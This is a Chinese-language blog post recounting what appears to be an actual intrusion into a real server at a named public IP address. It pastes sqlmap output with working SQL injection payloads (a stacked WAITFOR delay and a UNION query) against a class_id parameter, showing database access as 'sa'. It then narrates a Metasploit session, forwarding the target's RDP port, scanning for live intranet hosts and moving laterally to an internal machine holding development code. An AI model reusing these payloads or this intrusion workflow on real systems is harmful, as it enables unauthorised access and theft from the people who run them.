| 关键词: CHAR Microsoft Server UNION class 120 113 NULL INFO 机器 |
一个注射引发的内网沦陷 小菜没什么技术,只会用用工具 Parameter: class_id (GET) Type: stacked queries Title: Microsoft SQL Server/Sybasestacked queries (comment) Payload: class_id=1;WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: class_id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(120)+CHAR (118)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(65)+CHAR(79)+CHAR(110)+CHAR(68)+CHAR(10 0)+CHAR(72)+CHAR(117)+CHAR(86)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(120)+CHAR(113) ,NULL-- --- [13:20:30] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [13:20:30] [INFO] fetching current user current user: 'sa' [13:20:30] [INFO] fetched data logged to text files under 'C:\Administrator\.sqlmap \output\61.190.20.51' 接下来就是sqlmap + metasploit 的时间了 ![]() ![]() ![]() ![]() 可以看到成功上传payload,并建立了session 开启端口转发,将目标机器的3389转到本地3489 kali 是虚拟机 现在退到物理机连接kali(172.16.0.20) 的3489 ![]() sql server数据库 ![]() 写个bat检测内网存活主机 ![]() 在目标机上连接内网192.168.0.141,还是个08的系统 ![]() 翻一翻,会不会有惊喜呢... ![]() ![]() 看到有好多网站开发代码,还有svn,难道是做程序开发的??? 内网还有机器就不一一去试了,点到为止 嗯,还有什么呢... 对了,管理员密码是直接放到网站就跑出来了,建议修改密码吧 最后的最后,怎样才能脱离路人啊... |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|